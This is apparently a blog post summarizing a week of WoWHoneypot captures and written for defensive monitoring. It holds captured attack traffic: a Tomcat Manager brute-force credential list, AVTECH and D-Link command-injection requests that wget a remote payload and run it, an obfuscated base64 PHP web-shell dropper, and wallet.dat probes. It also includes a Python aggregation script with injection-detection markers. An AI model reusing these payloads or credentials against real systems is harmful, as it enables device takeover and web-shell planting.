【Honeypot】WoWHoneypot quick analysis (9/14-9/20)
I am currently monitoring both Honeytrap and Honeypot, but I had not really been summarizing the WoWHoneypot results, so I plan to write them up in a weekly post.
◾️WoWHoneypot
<Detection trends>
<Detection counts>
Detections on 10/15 were extremely high, and the majority of them were accesses to Tomcat Manager.
It was a brute-force attack trying to get past Basic authentication; the usernames and passwords tried were the kind that look likely to be in common use.
Examples:
123:1q2w3e4r
123:P@$$w0rd1234
123456:1qazXSW@
admin:123
admin:Pa$$w0rd@0
manager:P@$$w0rd1
role1:P@$$w0rd@123456
tomcat:nimda
<Malware downloads>
We detected attacks aimed at an AVTECH IP camera vulnerability. Many other honeypot operators have reported seeing the same thing.
Download source | Payload | Count |
--- | --- | --- |
hxxp://209[.]141[.]40[.]213/dlink | GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://xxx.xxx.xxx.xxx/dlink%20-O%20-%3E%20/tmp/gexoe;sh%20/tmp/gexoe%27$ HTTP/1.1.Connection: keep-alive.Accept-Encoding: gzip, deflate.Accept: */*.User-Agent: Sefa.. | 12 |
hxxp://209[.]141[.]40[.]213/avtech | GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20hxxp://xxx.xxx.xxx.xxx/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1.User-Agent: Sefa.Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8.Accept-Language: en-GB,en;q=0.5.Accept-Encoding: gzip, deflate.Connection: close.. | 13 |
<Detection breakdown>
Accesses to Tomcat Manager were by far the most common.
Method | Path | Count |
--- | --- | --- |
GET | /manager/html | 4775 |
GET | / | 226 |
GET | /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget hxxp://xxx.xxx.xxx.xxx/avtech -O niXd; chmod 777 niXd; sh niXd)&password=admin | 12 |
POST | /wls-wsat/CoordinatorPortType | 9 |
GET | hxxp://xxx.xxx.xxx.xxx/testget?q=23333&port=80 | 5 |
GET | /admin/assets/js/views/login.js | 4 |
GET | /wls-wsat/CoordinatorPortType | 4 |
HEAD | / | 4 |
GET | /HNAP1/ | 3 |
POST | /GponForm/diag_Form?images/ | 3 |
GET | //MyAdmin/scripts/setup.php | 2 |
GET | //myadmin/scripts/setup.php | 2 |
GET | //phpMyAdmin/scripts/setup.php | 2 |
GET | //phpmyadmin/scripts/setup.php | 2 |
GET | //pma/scripts/setup.php | 2 |
GET | /admin/phpMyAdmin/index.php | 2 |
GET | /claroline/phpMyAdmin/index.php | 2 |
GET | /index/article/lists/cid/3 | 2 |
GET | /login.cgi?cli=aa aa';wget hxxp://xxx.xxx.xxx.xxx/dlink -O -> /tmp/gexoe;sh /tmp/gexoe'$ | 2 |
GET | /muieblackcat | 2 |
GET | /phpMyAdmin/phpMyAdmin/index.php | 2 |
GET | /phpmyadmin/ | 2 |
GET | /tools/phpMyAdmin/index.php | 2 |
GET | /web/cgi-bin/hi3510/param.cgi?cmd=getp2pattr&cmd=getuserattr | 2 |
GET | /web/phpMyAdmin/index.php | 2 |
GET | /www/phpMyAdmin/index.php | 2 |
PROPFIND | / | 2 |
CONNECT | cn.bing.com:443 | 1 |
CONNECT | www.baidu.com:443 | 1 |
GET | /.bitcoin/wallet.dat | 1 |
GET | /.well-known/security.txt | 1 |
GET | //php/phpmyadmin/scripts/setup.php | 1 |
GET | //phpMyAdmin-2.6.9/scripts/setup.php | 1 |
GET | //phpMyAdmin-xxx.xxx.xxx.xxx/scripts/setup.php | 1 |
GET | /?XDEBUG_SESSION_START=phpstorm | 1 |
GET | /?a=<foo> | 1 |
GET | /PMA/index.php | 1 |
GET | /PMA2/index.php | 1 |
GET | /admin/PMA/index.php | 1 |
GET | /admin/index.php | 1 |
GET | /admin/mysql/index.php | 1 |
GET | /admin/mysql2/index.php | 1 |
GET | /admin/phpmyadmin/index.php | 1 |
GET | /admin/phpmyadmin2/index.php | 1 |
GET | /admin/pma/index.php | 1 |
GET | /ccvv | 1 |
GET | /cmx.php?cmd=echo "<?php \$func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';\$test=\$func('\$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e(\$x));');\$test('QHNlc3Npb25fc3RhcnQoKTtpZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpeyhzdWJzdHIoc2hhMShtZDUoQCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpJiYkX1NFU1NJT05bJ3RoZUNvZGUnXT10cmltKCRfUE9TVFsnY29kZSddKTt9aWYoaXNzZXQoJF9TRVNTSU9OWyd0aGVDb2RlJ10pKXtAZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VTU0lPTlsndGhlQ29kZSddKSk7fQ=='); ?>" >images.php & echo Hello, Peppa! | 1 |
GET | /cmx.php?cmd=echo ^<?php $func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';$test=$func('$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e($x));');$test('QHNlc3Npb25fc3RhcnQoKTtpZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpeyhzdWJzdHIoc2hhMShtZDUoQCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpJiYkX1NFU1NJT05bJ3RoZUNvZGUnXT10cmltKCRfUE9TVFsnY29kZSddKTt9aWYoaXNzZXQoJF9TRVNTSU9OWyd0aGVDb2RlJ10pKXtAZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VTU0lPTlsndGhlQ29kZSddKSk7fQ=='); ?^> >images.php & echo Hello, Peppa! | 1 |
GET | /console | 1 |
GET | /db/index.php | 1 |
GET | /dbadmin/index.php | 1 |
GET | /favicon.ico | 1 |
GET | /index.php | 1 |
GET | /login.cgi?cli=aa aa';wget hxxp://xxx.xxx.xxx.xxx/t.php'$ | 1 |
GET | /myadmin/index.php | 1 |
GET | /myadmin2/index.php | 1 |
GET | /mysql-admin/index.php | 1 |
GET | /mysql/index.php | 1 |
GET | /mysqladmin/index.php | 1 |
GET | /phpAdmin/index.php | 1 |
GET | /phpMyAbmin/index.php | 1 |
GET | /phpMyAdm1n/index.php | 1 |
GET | /phpMyAdmin ---/index.php | 1 |
GET | /phpMyAdmin-4.4.0/index.php | 1 |
GET | /phpMyAdmin.old/index.php | 1 |
GET | /phpMyAdmin/index.php | 1 |
GET | /phpMyAdmin__/index.php | 1 |
GET | /phpMyAdminold/index.php | 1 |
GET | /phpMyAdmion/index.php | 1 |
GET | /phpMyadmi/index.php | 1 |
GET | /phpMyadmin_bak/index.php | 1 |
GET | /phpadmin/index.php | 1 |
GET | /phpma/index.php | 1 |
GET | /phpmyadm1n/index.php | 1 |
GET | /phpmyadmin | 1 |
GET | /phpmyadmin-old/index.php | 1 |
GET | /phpmyadmin/index.php | 1 |
GET | /phpmyadmin/phpmyadmin/index.php | 1 |
GET | /phpmyadmin0/index.php | 1 |
GET | /phpmyadmin1/index.php | 1 |
GET | /phpmyadmin2/index.php | 1 |
GET | /pma-old/index.php | 1 |
GET | /pma/index.php | 1 |
GET | /pmamy/index.php | 1 |
GET | /pmamy2/index.php | 1 |
GET | /pmd/index.php | 1 |
GET | /robots.txt | 1 |
GET | /shaAdmin/index.php | 1 |
GET | /sitemap.xml | 1 |
GET | /typo3/phpmyadmin/index.php | 1 |
GET | /upload/bank-icons/bank-gh.jpg | 1 |
GET | /upload/bank-icons/bank_16.png | 1 |
GET | /v/index.php | 1 |
GET | /wallet.dat | 1 |
GET | /wallets/wallet.dat | 1 |
GET | /webadmin/tpl/style.admin.css | 1 |
GET | /webdav/ | 1 |
GET | /xampp/phpmyadmin/index.php | 1 |
GET | /yealink/y000000000000.cfg | 1 |
GET | hxxp://api.ipify.org/ | 1 |
GET | hxxp://www.123cha.com/ | 1 |
GET | hxxp://www.ip.cn/ | 1 |
GET | hxxp://xxx.xxx.xxx.xxx/echo.php | 1 |
GET | hxxp://xxx.xxx.xxx.xxx:10083/index.php | 1 |
HEAD | /newhome/img/logo.png | 1 |
HEAD | /static/upload/20180921/th_317a3298794099e0bab477e4f3d732a4.png | 1 |
OPTIONS | /ipc$ | 1 |
POST | / | 1 |
POST | /cmx.php | 1 |
POST | /images.php | 1 |
POST | hxxp://check.proxyradar.com/azenv.php?auth=153944726797&a=PSCN&i=2685440439&p=80 | 1 |
POST | hxxp://check.proxyradar.com/azenv.php?auth=153949072501&a=PSCN&i=2685440439&p=80 | 1 |
POST | hxxp://check.proxyradar.com/azenv.php?auth=153978850135&a=PSCN&i=2685440439&p=80 | 1 |
POST | hxxp://check.proxyradar.com/azenv.php?auth=153981707711&a=PSCN&i=2685440439&p=80 | 1 |
POST | hxxp://check.proxyradar.com/azenv.php?auth=153984761625&a=PSCN&i=2685440439&p=80 | 1 |
POST | hxxp://check.proxyradar.com/azenv.php?auth=153992111173&a=PSCN&i=2685440439&p=80 | 1 |
POST | hxxp://check.proxyradar.com/azenv.php?auth=153994958159&a=PSCN&i=2685440439&p=80 | 1 |
POST | hxxp://check.proxyradar.com/azenv.php?auth=153999669485&a=PSCN&i=2685440439&p=80 | 1 |
POST | hxxp://check.proxyradar.com/azenv.php?auth=154007072173&a=PSCN&i=2685440439&p=80 | 1 |
POST | hxxp://check.proxyradar.com/azenv.php?auth=154012893921&a=PSCN&i=2685440439&p=80 | 1 |
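The three views in this post (the user:password pairs tried against Tomcat Manager's Basic auth, the per-method/path counts, and the command-injection rows aimed at the camera and router CGI) can all be produced from the raw captured requests with a few lines of aggregation. The following is an added example, not code from the original post or from the WoWHoneypot project. It assumes the honeypot hands over each request as raw HTTP text; the sample requests are constructed, with documentation address ranges (192.0.2.0/24, 203.0.113.0/24) standing in for real hosts, and the category names are this example's own.

```python
"""Added example (not from the post or WoWHoneypot): aggregate raw captured
HTTP requests into the views shown in the weekly tables.

Assumed, not from the page: requests arrive as raw HTTP text; the samples
below are constructed and use documentation IP ranges instead of real hosts.
"""
import base64
import binascii
import re
from collections import Counter
from urllib.parse import unquote_plus

# Substrings that, once the path is URL-decoded, show an attempt to make the
# target fetch and execute something (the pattern in the AVTECH/D-Link rows).
INJECTION_MARKERS = ("wget ", "curl ", ";sh ", "; sh ", "$(", "chmod 777")
# Path fragments used by database-admin-panel scanners (the phpMyAdmin rows).
PMA_PATTERN = re.compile(r"(phpmyadm|myadmin|mysql|/pma|dbadmin)", re.IGNORECASE)


def parse_request(raw: str) -> dict:
    """Split raw HTTP text into method, path and a lower-cased header dict."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) < 2:
        raise ValueError(f"malformed request line: {lines[0]!r}")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": parts[0], "path": parts[1], "headers": headers}


def basic_credentials(headers: dict):
    """Return (user, password) from a Basic Authorization header, else None.
    Junk after 'Basic ' (non-base64, bad padding) yields None instead of
    crashing the whole aggregation run."""
    auth = headers.get("authorization", "")
    if not auth.lower().startswith("basic "):
        return None
    try:
        decoded = base64.b64decode(auth[6:], validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None
    user, _, password = decoded.partition(":")
    return user, password


def classify(req: dict) -> str:
    """Bucket one request into the categories the weekly tables use."""
    path = req["path"]
    if any(marker in unquote_plus(path) for marker in INJECTION_MARKERS):
        return "command-injection"
    if path.startswith("/manager/") and basic_credentials(req["headers"]):
        return "tomcat-manager-bruteforce"
    if PMA_PATTERN.search(path):
        return "phpmyadmin-scan"
    if path.startswith(("http://", "https://")) or req["method"] == "CONNECT":
        return "open-proxy-probe"
    return "other"


def summarize(raw_requests):
    """Return (per-(method, path) counts, credential-pair counts, per-category counts)."""
    by_path, creds, by_class = Counter(), Counter(), Counter()
    for raw in raw_requests:
        req = parse_request(raw)
        by_path[(req["method"], req["path"])] += 1
        by_class[classify(req)] += 1
        pair = basic_credentials(req["headers"])
        if pair:
            creds[f"{pair[0]}:{pair[1]}"] += 1
    return by_path, creds, by_class


# --- constructed sample input (not captured traffic) -----------------------
def basic_auth_header(user: str, password: str) -> str:
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def raw_request(method: str, path: str, headers=()) -> str:
    """Assemble a minimal raw HTTP/1.1 request for the samples below."""
    lines = [f"{method} {path} HTTP/1.1"] + [f"{k}: {v}" for k, v in headers]
    return "\r\n".join(lines) + "\r\n\r\n"


SAMPLE_REQUESTS = [
    raw_request("GET", "/manager/html", [("Authorization", basic_auth_header("tomcat", "nimda"))]),
    raw_request("GET", "/manager/html", [("Authorization", basic_auth_header("tomcat", "nimda"))]),
    raw_request("GET", "/manager/html", [("Authorization", basic_auth_header("admin", "123"))]),
    # D-Link-style row from the post, with a placeholder download host.
    raw_request("GET", "/login.cgi?cli=aa%20aa%27;wget%20http://192.0.2.10/dlink%20-O%20-%3E%20/tmp/gexoe;sh%20/tmp/gexoe%27$",
                [("User-Agent", "Sefa")]),
    raw_request("GET", "//phpMyAdmin/scripts/setup.php"),
    raw_request("GET", "http://203.0.113.7/testget?q=23333&port=80"),
    raw_request("GET", "/robots.txt"),
]

if __name__ == "__main__":
    by_path, creds, by_class = summarize(SAMPLE_REQUESTS)
    for (method, path), n in by_path.most_common():
        print(f"{method} | {path} | {n}")
    print("credentials tried:", dict(creds), "categories:", dict(by_class))
```

Two points worth keeping in mind when running this over real captures: the credential decoder deliberately uses `validate=True` and swallows decode errors, because scanners send malformed Authorization headers often enough that one bad line should not abort a week's aggregation; and the injection markers are matched only after URL-decoding, since the AVTECH and D-Link rows above arrive with every space and `>` percent-encoded and would slip past a check on the raw path.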
That concludes this quick analysis.